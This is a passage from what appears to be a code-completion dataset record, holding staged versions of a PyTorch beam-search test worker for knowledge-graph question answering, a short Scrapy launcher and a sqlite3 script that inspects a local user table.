batch_question.unsqueeze(1).repeat(1, k, 1).view(\n self.batch_size * k, -1)\n beam_question_len = batch_question_len.unsqueeze(1).repeat(1, k\n ).view(self.batch_size * k)\n beam_pred_vector = None\n if self.use_keqa_vector:\n beam_pred_vector = batch_pred_vector.unsqueeze(1).repeat(1,\n k, 1).view(self.batch_size * k, -1)\n db_outcomes, _, _, inv_offset = self.model.transit(t, e_t,\n beam_question, beam_question_len, batch_path_hidden, self.\n d_entity2bucketid, self.d_action_space_buckets, last_r, \n False, beam_pred_vector)\n db_action_spaces = [action_space for action_space, _ in db_outcomes\n ]\n db_action_dist = [action_dist for _, action_dist in db_outcomes]\n action_space = self.pad_and_cat_action_space(db_action_spaces,\n inv_offset)\n action_dist = self.pad_and_cat(db_action_dist, padding_value=0)[\n inv_offset]\n log_action_dist = log_action_prob.view(-1, 1) + safe_log(\n action_dist)\n if self.return_trace:\n print(t)\n print(last_r, e_t)\n print('----')\n print(action_space[0])\n print(F.softmax(log_action_dist.view(-1)).view(self.\n batch_size * k, -1))\n print('------------------------')\n if t == self.max_hop - 1:\n action, log_action_prob, action_offset = (self.\n top_k_answer_unique(log_action_dist, action_space))\n else:\n action, log_action_prob, action_offset = self.top_k_action(\n log_action_dist, action_space)\n path_list, (h_t, c_t) = self.model.update_path(action,\n path_hidden, offset=action_offset)\n self.env.step(action, path_list, (h_t, c_t))\n if self.return_trace:\n rearrange_vector_list(l_log_action_probs, action_offset)\n l_log_action_probs.append(log_action_prob)\n self.adjust_search_trace(l_search_trace, action_offset)\n l_search_trace.append(action)\n batch_pred_e2 = action[1].view(self.batch_size, -1)\n batch_pred_e2_top1 = batch_pred_e2[:, 0].view(self.batch_size, -1)\n batch_hits1 = torch.sum(torch.gather(batch_answers, 1,\n batch_pred_e2_top1).view(-1)).item()\n if self.return_trace:\n self.print_search_trace(batch_head, l_search_trace,\n l_log_action_probs)\n return batch_hits1\n\n def top_k_action(self, log_action_dist, action_space):\n full_size = len(log_action_dist)\n last_k = int(full_size / self.batch_size)\n (r_space, e_space), _ = action_space\n action_space_size = r_space.size()[1]\n log_action_dist = log_action_dist.view(self.batch_size, -1)\n beam_action_space_size = log_action_dist.size()[1]\n k = min(self.beam_size, beam_action_space_size)\n log_action_prob, action_ind = torch.topk(log_action_dist, k)\n next_r = torch.gather(r_space.view(self.batch_size, -1), 1, action_ind\n ).view(-1)\n next_e = torch.gather(e_space.view(self.batch_size, -1), 1, action_ind\n ).view(-1)\n log_action_prob = log_action_prob.view(-1)\n action_beam_offset = action_ind // action_space_size\n action_batch_offset = (torch.arange(self.batch_size).cuda(self.\n gpu_id) * last_k).unsqueeze(1)\n action_offset = (action_batch_offset + action_beam_offset).view(-1)\n return (next_r, next_e), log_action_prob, action_offset\n\n def top_k_answer_unique(self, log_action_dist, action_space):\n full_size = len(log_action_dist)\n last_k = int(full_size / self.batch_size)\n (r_space, e_space), _ = action_space\n action_space_size = r_space.size()[1]\n r_space = r_space.view(self.batch_size, -1)\n e_space = e_space.view(self.batch_size, -1)\n log_action_dist = log_action_dist.view(self.batch_size, -1)\n beam_action_space_size = log_action_dist.size()[1]\n k = min(self.beam_size, beam_action_space_size)\n next_r_list, next_e_list = [], []\n log_action_prob_list = []\n action_offset_list = []\n for i in range(self.batch_size):\n log_action_dist_b = log_action_dist[i]\n r_space_b = r_space[i]\n e_space_b = e_space[i]\n unique_e_space_b = torch.unique(e_space_b.data.cpu()).cuda(self\n .gpu_id)\n unique_log_action_dist, unique_idx = self.unique_max(\n unique_e_space_b, e_space_b, log_action_dist_b)\n k_prime = min(len(unique_e_space_b), k)\n top_unique_log_action_dist, top_unique_idx2 = torch.topk(\n unique_log_action_dist, k_prime)\n top_unique_idx = unique_idx[top_unique_idx2]\n top_unique_beam_offset = top_unique_idx // action_space_size\n top_r = r_space_b[top_unique_idx]\n top_e = e_space_b[top_unique_idx]\n next_r_list.append(top_r.unsqueeze(0))\n next_e_list.append(top_e.unsqueeze(0))\n log_action_prob_list.append(top_unique_log_action_dist.unsqueeze(0)\n )\n top_unique_batch_offset = i * last_k\n top_unique_action_offset = (top_unique_batch_offset +\n top_unique_beam_offset)\n action_offset_list.append(top_unique_action_offset.unsqueeze(0))\n next_r = self.pad_and_cat(next_r_list, padding_value=0).view(-1)\n next_e = self.pad_and_cat(next_e_list, padding_value=0).view(-1)\n log_action_prob = self.pad_and_cat(log_action_prob_list,\n padding_value=-float('inf'))\n action_offset = self.pad_and_cat(action_offset_list, padding_value=-1)\n return (next_r, next_e), log_action_prob.view(-1), action_offset.view(\n -1)\n\n def sync_model(self):\n self.model.load_state_dict(self.shared_model.state_dict())\n\n def pad_and_cat_action_space(self, action_spaces, inv_offset):\n db_r_space, db_e_space, db_action_mask = [], [], []\n for (r_space, e_space), action_mask in action_spaces:\n db_r_space.append(r_space)\n db_e_space.append(e_space)\n db_action_mask.append(action_mask)\n r_space = self.pad_and_cat(db_r_space, padding_value=0)[inv_offset]\n e_space = self.pad_and_cat(db_e_space, padding_value=0)[inv_offset]\n action_mask = self.pad_and_cat(db_action_mask, padding_value=0)[\n inv_offset]\n action_space = (r_space, e_space), action_mask\n return action_space\n\n def pad_and_cat(self, a, padding_value, padding_dim=1):\n max_dim_size = max([x.size()[padding_dim] for x in a])\n padded_a = []\n for x in a:\n if x.size()[padding_dim] < max_dim_size:\n res_len = max_dim_size - x.size()[1]\n pad = nn.ConstantPad1d((0, res_len), padding_value)\n padded_a.append(pad(x))\n else:\n padded_a.append(x)\n return torch.cat(padded_a, dim=0).cuda(self.gpu_id)\n\n def unique_max(self, unique_x, x, values, marker_2D=None):\n unique_interval = 100\n HUGE_INT = 1e+31\n unique_values, unique_indices = [], []\n for i in range(0, len(unique_x), unique_interval):\n unique_x_b = unique_x[i:i + unique_interval]\n marker_2D = (unique_x_b.unsqueeze(1) == x.unsqueeze(0)).float()\n values_2D = marker_2D * values.unsqueeze(0) - (1 - marker_2D\n ) * HUGE_INT\n unique_values_b, unique_idx_b = values_2D.max(dim=1)\n unique_values.append(unique_values_b)\n unique_indices.append(unique_idx_b)\n unique_values = torch.cat(unique_values).cuda(self.gpu_id)\n unique_idx = torch.cat(unique_indices).cuda(self.gpu_id)\n return unique_values, unique_idx\n\n def adjust_search_trace(self, search_trace, action_offset):\n for i, (r, e) in enumerate(search_trace):\n new_r = r[action_offset]\n new_e = e[action_offset]\n search_trace[i] = new_r, new_e\n <mask token>\n",
"step-4": "<mask token>\n\n\nclass TestWorker(mp.Process):\n\n def __init__(self, args, worker_id, env, d_entity_neighours,\n d_entity2bucketid, d_action_space_buckets, d_entity2id,\n d_relation2id, reqa_checkpoint_path, d_results, word_num,\n entity_num, relation_num, keqa_checkpoint_path, return_trace=False):\n super().__init__(name='test-worker-%02d' % worker_id)\n self.args = args\n self.seed = args.seed + worker_id\n self.fix_batch_size = args.batch_size\n self.use_keqa_vector = args.use_keqa_vector\n self.max_hop = args.max_hop\n self.beam_size = args.beam_size\n self.return_trace = return_trace\n self.d_entity_neighours = d_entity_neighours\n self.d_entity2bucketid = d_entity2bucketid\n self.d_action_space_buckets = d_action_space_buckets\n self.id2entity = index2word(d_entity2id)\n self.id2relation = index2word(d_relation2id)\n self.worker_id = worker_id\n self.gpu_id = self.worker_id % get_num_gpus()\n self.env = env\n self.d_results = d_results\n self.reqa_checkpoint_path = reqa_checkpoint_path\n self.word_num = word_num\n self.entity_num = entity_num\n self.relation_num = relation_num\n self.keqa_checkpoint_path = keqa_checkpoint_path\n\n def run(self):\n set_seed(self.seed)\n self.model = Policy_Network(self.args, self.word_num, self.\n entity_num, self.relation_num, self.keqa_checkpoint_path, self.\n gpu_id)\n self.model.load(self.reqa_checkpoint_path)\n self.model.cuda(self.gpu_id)\n self.model.eval()\n self.env.set_model(self.model)\n self.env.set_gpu_id(self.gpu_id)\n total_data_num = len(self.env.d_dataset)\n hits_1_num = 0\n with torch.no_grad():\n for example_id in tqdm(range(0, len(self.env.d_dataset), self.\n fix_batch_size), desc=self.name, position=self.worker_id):\n idx = range(example_id, example_id + self.fix_batch_size)\n self.env.reset(idx)\n self.batch_size = self.env.batch_size\n batch_hits1 = self.rollout()\n hits_1_num += batch_hits1\n hits_1_result = 1.0 * hits_1_num / total_data_num\n self.d_results['hits@1'] = hits_1_result\n\n def rollout(self):\n batch_question, batch_question_len, batch_head, batch_answers = (self\n .env.return_batch_data())\n if self.return_trace:\n l_search_trace = []\n l_log_action_probs = []\n batch_pred_vector = None\n if self.use_keqa_vector:\n batch_pred_vector = self.model.get_anticipated_entity_vector(\n batch_head, batch_question, batch_question_len, self.\n d_entity_neighours)\n log_action_prob = torch.zeros(self.batch_size).cuda(self.gpu_id)\n for t in range(self.max_hop):\n path_trace, path_hidden = self.env.observe()\n last_r, e_t = path_trace[-1]\n batch_path_hidden = path_hidden[-1][0][-1, :, :]\n k = int(e_t.size()[0] / self.batch_size)\n beam_question = batch_question.unsqueeze(1).repeat(1, k, 1).view(\n self.batch_size * k, -1)\n beam_question_len = batch_question_len.unsqueeze(1).repeat(1, k\n ).view(self.batch_size * k)\n beam_pred_vector = None\n if self.use_keqa_vector:\n beam_pred_vector = batch_pred_vector.unsqueeze(1).repeat(1,\n k, 1).view(self.batch_size * k, -1)\n db_outcomes, _, _, inv_offset = self.model.transit(t, e_t,\n beam_question, beam_question_len, batch_path_hidden, self.\n d_entity2bucketid, self.d_action_space_buckets, last_r, \n False, beam_pred_vector)\n db_action_spaces = [action_space for action_space, _ in db_outcomes\n ]\n db_action_dist = [action_dist for _, action_dist in db_outcomes]\n action_space = self.pad_and_cat_action_space(db_action_spaces,\n inv_offset)\n action_dist = self.pad_and_cat(db_action_dist, padding_value=0)[\n inv_offset]\n log_action_dist = log_action_prob.view(-1, 1) + safe_log(\n action_dist)\n if self.return_trace:\n print(t)\n print(last_r, e_t)\n print('----')\n print(action_space[0])\n print(F.softmax(log_action_dist.view(-1)).view(self.\n batch_size * k, -1))\n print('------------------------')\n if t == self.max_hop - 1:\n action, log_action_prob, action_offset = (self.\n top_k_answer_unique(log_action_dist, action_space))\n else:\n action, log_action_prob, action_offset = self.top_k_action(\n log_action_dist, action_space)\n path_list, (h_t, c_t) = self.model.update_path(action,\n path_hidden, offset=action_offset)\n self.env.step(action, path_list, (h_t, c_t))\n if self.return_trace:\n rearrange_vector_list(l_log_action_probs, action_offset)\n l_log_action_probs.append(log_action_prob)\n self.adjust_search_trace(l_search_trace, action_offset)\n l_search_trace.append(action)\n batch_pred_e2 = action[1].view(self.batch_size, -1)\n batch_pred_e2_top1 = batch_pred_e2[:, 0].view(self.batch_size, -1)\n batch_hits1 = torch.sum(torch.gather(batch_answers, 1,\n batch_pred_e2_top1).view(-1)).item()\n if self.return_trace:\n self.print_search_trace(batch_head, l_search_trace,\n l_log_action_probs)\n return batch_hits1\n\n def top_k_action(self, log_action_dist, action_space):\n full_size = len(log_action_dist)\n last_k = int(full_size / self.batch_size)\n (r_space, e_space), _ = action_space\n action_space_size = r_space.size()[1]\n log_action_dist = log_action_dist.view(self.batch_size, -1)\n beam_action_space_size = log_action_dist.size()[1]\n k = min(self.beam_size, beam_action_space_size)\n log_action_prob, action_ind = torch.topk(log_action_dist, k)\n next_r = torch.gather(r_space.view(self.batch_size, -1), 1, action_ind\n ).view(-1)\n next_e = torch.gather(e_space.view(self.batch_size, -1), 1, action_ind\n ).view(-1)\n log_action_prob = log_action_prob.view(-1)\n action_beam_offset = action_ind // action_space_size\n action_batch_offset = (torch.arange(self.batch_size).cuda(self.\n gpu_id) * last_k).unsqueeze(1)\n action_offset = (action_batch_offset + action_beam_offset).view(-1)\n return (next_r, next_e), log_action_prob, action_offset\n\n def top_k_answer_unique(self, log_action_dist, action_space):\n full_size = len(log_action_dist)\n last_k = int(full_size / self.batch_size)\n (r_space, e_space), _ = action_space\n action_space_size = r_space.size()[1]\n r_space = r_space.view(self.batch_size, -1)\n e_space = e_space.view(self.batch_size, -1)\n log_action_dist = log_action_dist.view(self.batch_size, -1)\n beam_action_space_size = log_action_dist.size()[1]\n k = min(self.beam_size, beam_action_space_size)\n next_r_list, next_e_list = [], []\n log_action_prob_list = []\n action_offset_list = []\n for i in range(self.batch_size):\n log_action_dist_b = log_action_dist[i]\n r_space_b = r_space[i]\n e_space_b = e_space[i]\n unique_e_space_b = torch.unique(e_space_b.data.cpu()).cuda(self\n .gpu_id)\n unique_log_action_dist, unique_idx = self.unique_max(\n unique_e_space_b, e_space_b, log_action_dist_b)\n k_prime = min(len(unique_e_space_b), k)\n top_unique_log_action_dist, top_unique_idx2 = torch.topk(\n unique_log_action_dist, k_prime)\n top_unique_idx = unique_idx[top_unique_idx2]\n top_unique_beam_offset = top_unique_idx // action_space_size\n top_r = r_space_b[top_unique_idx]\n top_e = e_space_b[top_unique_idx]\n next_r_list.append(top_r.unsqueeze(0))\n next_e_list.append(top_e.unsqueeze(0))\n log_action_prob_list.append(top_unique_log_action_dist.unsqueeze(0)\n )\n top_unique_batch_offset = i * last_k\n top_unique_action_offset = (top_unique_batch_offset +\n top_unique_beam_offset)\n action_offset_list.append(top_unique_action_offset.unsqueeze(0))\n next_r = self.pad_and_cat(next_r_list, padding_value=0).view(-1)\n next_e = self.pad_and_cat(next_e_list, padding_value=0).view(-1)\n log_action_prob = self.pad_and_cat(log_action_prob_list,\n padding_value=-float('inf'))\n action_offset = self.pad_and_cat(action_offset_list, padding_value=-1)\n return (next_r, next_e), log_action_prob.view(-1), action_offset.view(\n -1)\n\n def sync_model(self):\n self.model.load_state_dict(self.shared_model.state_dict())\n\n def pad_and_cat_action_space(self, action_spaces, inv_offset):\n db_r_space, db_e_space, db_action_mask = [], [], []\n for (r_space, e_space), action_mask in action_spaces:\n db_r_space.append(r_space)\n db_e_space.append(e_space)\n db_action_mask.append(action_mask)\n r_space = self.pad_and_cat(db_r_space, padding_value=0)[inv_offset]\n e_space = self.pad_and_cat(db_e_space, padding_value=0)[inv_offset]\n action_mask = self.pad_and_cat(db_action_mask, padding_value=0)[\n inv_offset]\n action_space = (r_space, e_space), action_mask\n return action_space\n\n def pad_and_cat(self, a, padding_value, padding_dim=1):\n max_dim_size = max([x.size()[padding_dim] for x in a])\n padded_a = []\n for x in a:\n if x.size()[padding_dim] < max_dim_size:\n res_len = max_dim_size - x.size()[1]\n pad = nn.ConstantPad1d((0, res_len), padding_value)\n padded_a.append(pad(x))\n else:\n padded_a.append(x)\n return torch.cat(padded_a, dim=0).cuda(self.gpu_id)\n\n def unique_max(self, unique_x, x, values, marker_2D=None):\n unique_interval = 100\n HUGE_INT = 1e+31\n unique_values, unique_indices = [], []\n for i in range(0, len(unique_x), unique_interval):\n unique_x_b = unique_x[i:i + unique_interval]\n marker_2D = (unique_x_b.unsqueeze(1) == x.unsqueeze(0)).float()\n values_2D = marker_2D * values.unsqueeze(0) - (1 - marker_2D\n ) * HUGE_INT\n unique_values_b, unique_idx_b = values_2D.max(dim=1)\n unique_values.append(unique_values_b)\n unique_indices.append(unique_idx_b)\n unique_values = torch.cat(unique_values).cuda(self.gpu_id)\n unique_idx = torch.cat(unique_indices).cuda(self.gpu_id)\n return unique_values, unique_idx\n\n def adjust_search_trace(self, search_trace, action_offset):\n for i, (r, e) in enumerate(search_trace):\n new_r = r[action_offset]\n new_e = e[action_offset]\n search_trace[i] = new_r, new_e\n\n def print_search_trace(self, batch_head, l_search_trace, l_log_action_probs\n ):\n for i in range(self.batch_size):\n top_k_edge_labels = []\n for k, log_action_prob in enumerate(l_log_action_probs):\n beam_size = len(log_action_prob)\n for j in range(beam_size):\n ind = i * beam_size + j\n r = self.id2relation[int(l_search_trace[k][0][ind])]\n e = self.id2entity[int(l_search_trace[k][1][ind])]\n if r.endswith('_inverse'):\n edge_label = '<-{}-{} {}'.format(r[:-8], e, float(\n log_action_prob[ind]))\n else:\n edge_label = '-{}->{} {}'.format(r, e, float(\n log_action_prob[ind]))\n if k == 0:\n edge_label = self.id2entity[int(batch_head[i])\n ] + edge_label\n top_k_edge_labels.append(edge_label)\n else:\n top_k_edge_labels[j] += edge_label\n for i, edge_label in enumerate(top_k_edge_labels):\n print(i, edge_label)\n print('*****************************')\n",
"step-5": "import torch\nimport torch.nn as nn\nfrom tqdm import tqdm\nimport torch.nn.functional as F\nimport torch.multiprocessing as mp\nfrom policy_network import Policy_Network\nfrom util import safe_log\nfrom util import index2word, rearrange_vector_list, get_num_gpus, set_seed\n\nclass TestWorker(mp.Process):\n def __init__(self, args, worker_id, env, d_entity_neighours, d_entity2bucketid, d_action_space_buckets, d_entity2id, d_relation2id, reqa_checkpoint_path, d_results, word_num, entity_num, relation_num, keqa_checkpoint_path, return_trace = False):\n super().__init__(name='test-worker-%02d' % (worker_id))\n self.args = args\n self.seed = args.seed + worker_id\n self.fix_batch_size = args.batch_size\n self.use_keqa_vector = args.use_keqa_vector\n self.max_hop = args.max_hop\n self.beam_size = args.beam_size\n self.return_trace = return_trace\n\n self.d_entity_neighours = d_entity_neighours\n self.d_entity2bucketid = d_entity2bucketid\n self.d_action_space_buckets = d_action_space_buckets\n self.id2entity = index2word(d_entity2id)\n self.id2relation = index2word(d_relation2id)\n self.worker_id = worker_id\n self.gpu_id = self.worker_id % get_num_gpus()\n self.env = env\n self.d_results = d_results\n self.reqa_checkpoint_path = reqa_checkpoint_path\n self.word_num = word_num \n self.entity_num = entity_num\n self.relation_num = relation_num\n self.keqa_checkpoint_path = keqa_checkpoint_path\n\n def run(self):\n set_seed(self.seed)\n self.model = Policy_Network(self.args, self.word_num, self.entity_num, self.relation_num, self.keqa_checkpoint_path, self.gpu_id)\n self.model.load(self.reqa_checkpoint_path)\n self.model.cuda(self.gpu_id)\n self.model.eval()\n self.env.set_model(self.model)\n self.env.set_gpu_id(self.gpu_id)\n total_data_num = len(self.env.d_dataset)\n\n hits_1_num = 0\n with torch.no_grad():\n for example_id in tqdm(range(0, len(self.env.d_dataset), self.fix_batch_size), desc=self.name, position=self.worker_id): \n idx = range(example_id, example_id + self.fix_batch_size) \n \n self.env.reset(idx)\n self.batch_size = self.env.batch_size \n \n batch_hits1 = self.rollout() \n hits_1_num += batch_hits1\n\n \n hits_1_result = 1.0 * hits_1_num / total_data_num\n self.d_results['hits@1'] = hits_1_result\n\n def rollout(self): \n batch_question, batch_question_len, batch_head, batch_answers = self.env.return_batch_data()\n\n if self.return_trace:\n l_search_trace = []\n l_log_action_probs = []\n\n batch_pred_vector = None\n if self.use_keqa_vector:\n batch_pred_vector = self.model.get_anticipated_entity_vector(batch_head, batch_question, batch_question_len, self.d_entity_neighours)\n \n log_action_prob = torch.zeros(self.batch_size).cuda(self.gpu_id)\n for t in range(self.max_hop):\n path_trace, path_hidden = self.env.observe()\n last_r, e_t = path_trace[-1] \n \n batch_path_hidden = path_hidden[-1][0][-1, :, :]\n \n k = int(e_t.size()[0] / self.batch_size) \n\n beam_question = batch_question.unsqueeze(1).repeat(1, k, 1).view(self.batch_size * k, -1) \n beam_question_len = batch_question_len.unsqueeze(1).repeat(1, k).view(self.batch_size * k) \n \n beam_pred_vector = None\n if self.use_keqa_vector:\n beam_pred_vector = batch_pred_vector.unsqueeze(1).repeat(1, k, 1).view(self.batch_size * k, -1) \n \n db_outcomes, _, _, inv_offset = self.model.transit(t, e_t, beam_question, beam_question_len, batch_path_hidden, self.d_entity2bucketid, self.d_action_space_buckets, last_r, False, beam_pred_vector) \n db_action_spaces = [action_space for action_space, _ in db_outcomes]\n db_action_dist = [action_dist for _, action_dist in db_outcomes]\n \n action_space = self.pad_and_cat_action_space(db_action_spaces, inv_offset) \n action_dist = self.pad_and_cat(db_action_dist, padding_value=0)[inv_offset]\n\n log_action_dist = log_action_prob.view(-1, 1) + safe_log(action_dist) \n\n if self.return_trace:\n print(t)\n print(last_r, e_t)\n print(\"----\")\n print(action_space[0])\n print(F.softmax(log_action_dist.view(-1)).view(self.batch_size * k, -1))\n print(\"------------------------\")\n\n if t == self.max_hop - 1:\n action, log_action_prob, action_offset = self.top_k_answer_unique(log_action_dist, action_space)\n else:\n action, log_action_prob, action_offset = self.top_k_action(log_action_dist, action_space)\n \n path_list, (h_t, c_t) = self.model.update_path(action, path_hidden, offset = action_offset) \n self.env.step(action, path_list, (h_t, c_t))\n\n if self.return_trace:\n rearrange_vector_list(l_log_action_probs, action_offset)\n l_log_action_probs.append(log_action_prob) \n self.adjust_search_trace(l_search_trace, action_offset)\n l_search_trace.append(action)\n \n batch_pred_e2 = action[1].view(self.batch_size, -1) \n batch_pred_e2_top1 = batch_pred_e2[:, 0].view(self.batch_size, -1)\n \n batch_hits1 = torch.sum(torch.gather(batch_answers, 1, batch_pred_e2_top1).view(-1)).item()\n\n if self.return_trace:\n self.print_search_trace(batch_head, l_search_trace, l_log_action_probs)\n \n return batch_hits1\n\n\n def top_k_action(self, log_action_dist, action_space):\n full_size = len(log_action_dist)\n last_k = int(full_size / self.batch_size)\n\n (r_space, e_space), _ = action_space\n action_space_size = r_space.size()[1]\n\n log_action_dist = log_action_dist.view(self.batch_size, -1) \n beam_action_space_size = log_action_dist.size()[1]\n k = min(self.beam_size, beam_action_space_size) \n\n log_action_prob, action_ind = torch.topk(log_action_dist, k) \n next_r = torch.gather(r_space.view(self.batch_size, -1), 1, action_ind).view(-1) \n next_e = torch.gather(e_space.view(self.batch_size, -1), 1, action_ind).view(-1) \n log_action_prob = log_action_prob.view(-1) \n action_beam_offset = action_ind // action_space_size \n action_batch_offset = (torch.arange(self.batch_size).cuda(self.gpu_id) * last_k).unsqueeze(1) \n action_offset = (action_batch_offset + action_beam_offset).view(-1) \n\n return (next_r, next_e), log_action_prob, action_offset \n \n def top_k_answer_unique(self, log_action_dist, action_space):\n full_size = len(log_action_dist)\n last_k = int(full_size / self.batch_size)\n (r_space, e_space), _ = action_space\n action_space_size = r_space.size()[1]\n\n r_space = r_space.view(self.batch_size, -1) \n e_space = e_space.view(self.batch_size, -1)\n log_action_dist = log_action_dist.view(self.batch_size, -1)\n beam_action_space_size = log_action_dist.size()[1]\n \n k = min(self.beam_size, beam_action_space_size)\n next_r_list, next_e_list = [], []\n log_action_prob_list = []\n action_offset_list = []\n\n for i in range(self.batch_size):\n log_action_dist_b = log_action_dist[i]\n r_space_b = r_space[i]\n e_space_b = e_space[i]\n unique_e_space_b = torch.unique(e_space_b.data.cpu()).cuda(self.gpu_id) \n unique_log_action_dist, unique_idx = self.unique_max(unique_e_space_b, e_space_b, log_action_dist_b) \n k_prime = min(len(unique_e_space_b), k)\n top_unique_log_action_dist, top_unique_idx2 = torch.topk(unique_log_action_dist, k_prime)\n top_unique_idx = unique_idx[top_unique_idx2]\n top_unique_beam_offset = top_unique_idx // action_space_size\n top_r = r_space_b[top_unique_idx]\n top_e = e_space_b[top_unique_idx]\n next_r_list.append(top_r.unsqueeze(0))\n next_e_list.append(top_e.unsqueeze(0))\n log_action_prob_list.append(top_unique_log_action_dist.unsqueeze(0))\n top_unique_batch_offset = i * last_k\n top_unique_action_offset = top_unique_batch_offset + top_unique_beam_offset\n action_offset_list.append(top_unique_action_offset.unsqueeze(0))\n next_r = self.pad_and_cat(next_r_list, padding_value=0).view(-1)\n next_e = self.pad_and_cat(next_e_list, padding_value=0).view(-1)\n log_action_prob = self.pad_and_cat(log_action_prob_list, padding_value = -float(\"inf\"))\n action_offset = self.pad_and_cat(action_offset_list, padding_value=-1)\n return (next_r, next_e), log_action_prob.view(-1), action_offset.view(-1)\n\n def sync_model(self):\n self.model.load_state_dict(self.shared_model.state_dict())\n \n def pad_and_cat_action_space(self, action_spaces, inv_offset):\n db_r_space, db_e_space, db_action_mask = [], [], []\n for (r_space, e_space), action_mask in action_spaces:\n db_r_space.append(r_space)\n db_e_space.append(e_space)\n db_action_mask.append(action_mask)\n r_space = self.pad_and_cat(db_r_space, padding_value=0)[inv_offset]\n e_space = self.pad_and_cat(db_e_space, padding_value=0)[inv_offset]\n action_mask = self.pad_and_cat(db_action_mask, padding_value=0)[inv_offset]\n action_space = ((r_space, e_space), action_mask)\n return action_space\n \n def pad_and_cat(self, a, padding_value, padding_dim=1):\n max_dim_size = max([x.size()[padding_dim] for x in a])\n padded_a = []\n for x in a:\n if x.size()[padding_dim] < max_dim_size:\n res_len = max_dim_size - x.size()[1]\n pad = nn.ConstantPad1d((0, res_len), padding_value)\n padded_a.append(pad(x))\n else:\n padded_a.append(x)\n return torch.cat(padded_a, dim=0).cuda(self.gpu_id)\n \n\n def unique_max(self, unique_x, x, values, marker_2D=None):\n unique_interval = 100\n HUGE_INT = 1e31\n\n unique_values, unique_indices = [], []\n for i in range(0, len(unique_x), unique_interval):\n unique_x_b = unique_x[i:i+unique_interval]\n marker_2D = (unique_x_b.unsqueeze(1) == x.unsqueeze(0)).float() \n values_2D = marker_2D * values.unsqueeze(0) - (1 - marker_2D) * HUGE_INT \n unique_values_b, unique_idx_b = values_2D.max(dim=1) \n unique_values.append(unique_values_b)\n unique_indices.append(unique_idx_b)\n unique_values = torch.cat(unique_values).cuda(self.gpu_id)\n unique_idx = torch.cat(unique_indices).cuda(self.gpu_id)\n return unique_values, unique_idx\n \n def adjust_search_trace(self, search_trace, action_offset):\n for i, (r, e) in enumerate(search_trace):\n new_r = r[action_offset]\n new_e = e[action_offset]\n search_trace[i] = (new_r, new_e)\n \n def print_search_trace(self, batch_head, l_search_trace, l_log_action_probs):\n for i in range(self.batch_size):\n top_k_edge_labels = []\n for k, log_action_prob in enumerate(l_log_action_probs):\n beam_size = len(log_action_prob)\n for j in range(beam_size): \n ind = i * beam_size + j\n r = self.id2relation[int(l_search_trace[k][0][ind])]\n e = self.id2entity[int(l_search_trace[k][1][ind])]\n if r.endswith('_inverse'):\n edge_label = '<-{}-{} {}'.format(r[:-8], e, float(log_action_prob[ind]))\n else:\n edge_label = '-{}->{} {}'.format(r, e, float(log_action_prob[ind]))\n \n if k == 0:\n edge_label = self.id2entity[int(batch_head[i])] + edge_label\n top_k_edge_labels.append(edge_label) \n else:\n top_k_edge_labels[j] += edge_label \n \n for i, edge_label in enumerate(top_k_edge_labels):\n print(i, edge_label)\n print(\"*****************************\")\n\n\n",
"step-ids": [
6,
9,
10,
12,
14
]
}
|
[
6,
9,
10,
12,
14
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
cmdline.execute('scrapy crawl ariz'.split())
<|reserved_special_token_1|>
from scrapy import cmdline
cmdline.execute('scrapy crawl ariz'.split())
<|reserved_special_token_1|>
from scrapy import cmdline
cmdline.execute("scrapy crawl ariz".split())
|
flexible
|
{
"blob_id": "abb2cfd2113e8de6c7bba42c357f0ec140b224a9",
"index": 3311,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ncmdline.execute('scrapy crawl ariz'.split())\n",
"step-3": "from scrapy import cmdline\ncmdline.execute('scrapy crawl ariz'.split())\n",
"step-4": "from scrapy import cmdline\ncmdline.execute(\"scrapy crawl ariz\".split())",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
cursor.execute(
"select name from sqlite_master where type = 'table' order by name")
print('Tables name:', cursor.fetchall())
cursor.execute('PRAGMA table_info(user)')
print('Table structure:', cursor.fetchall())
cursor.execute('select * from user')
print('Table record:', cursor.fetchall())
cursor.close()
conn.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
conn = sqlite3.connect('app.db')
cursor = conn.cursor()
cursor.execute(
"select name from sqlite_master where type = 'table' order by name")
print('Tables name:', cursor.fetchall())
cursor.execute('PRAGMA table_info(user)')
print('Table structure:', cursor.fetchall())
cursor.execute('select * from user')
print('Table record:', cursor.fetchall())
cursor.close()
conn.close()
<|reserved_special_token_1|>
import sqlite3
conn = sqlite3.connect('app.db')
cursor = conn.cursor()
cursor.execute(
"select name from sqlite_master where type = 'table' order by name")
print('Tables name:', cursor.fetchall())
cursor.execute('PRAGMA table_info(user)')
print('Table structure:', cursor.fetchall())
cursor.execute('select * from user')
print('Table record:', cursor.fetchall())
cursor.close()
conn.close()
<|reserved_special_token_1|>
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sqlite3
# 连接到db文件
conn = sqlite3.connect('app.db')
# 创建一个Cursor:
cursor = conn.cursor()
# 查询所有表名:
cursor.execute("select name from sqlite_master where type = 'table' order by name")
print("Tables name:", cursor.fetchall())
# 查询表user的结构:
cursor.execute('PRAGMA table_info(user)')
print("Table structure:", cursor.fetchall())
# 执行查询表user内的所有记录:
cursor.execute('select * from user')
print("Table record:", cursor.fetchall())
cursor.close()
conn.close()
|
flexible
|
{
"blob_id": "dd8f4b08b88d487b68e916e9f92c08c9c0bc39da",
"index": 2681,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ncursor.execute(\n \"select name from sqlite_master where type = 'table' order by name\")\nprint('Tables name:', cursor.fetchall())\ncursor.execute('PRAGMA table_info(user)')\nprint('Table structure:', cursor.fetchall())\ncursor.execute('select * from user')\nprint('Table record:', cursor.fetchall())\ncursor.close()\nconn.close()\n",
"step-3": "<mask token>\nconn = sqlite3.connect('app.db')\ncursor = conn.cursor()\ncursor.execute(\n \"select name from sqlite_master where type = 'table' order by name\")\nprint('Tables name:', cursor.fetchall())\ncursor.execute('PRAGMA table_info(user)')\nprint('Table structure:', cursor.fetchall())\ncursor.execute('select * from user')\nprint('Table record:', cursor.fetchall())\ncursor.close()\nconn.close()\n",
